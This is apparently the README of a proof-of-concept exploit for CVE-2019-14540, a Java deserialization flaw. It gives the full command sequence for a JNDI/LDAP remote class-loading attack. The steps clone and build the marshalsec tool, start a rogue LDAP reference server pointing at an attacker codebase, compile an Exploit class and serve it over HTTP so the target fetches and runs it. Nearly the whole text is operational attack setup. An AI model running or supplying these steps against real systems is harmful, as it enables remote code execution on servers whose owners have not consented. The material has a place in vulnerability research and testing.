
CVE-2019-14540 Exploit
http://www.leadroyal.cn/?p=939
Environment limitation: This demo uses the jndi ldap exploitation method, so a low version (less than 8u191) of the jdk is required.
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389
cd remote_codebase
javac Exploit.java
cd remote_codebase
python -m SimpleHTTPServer
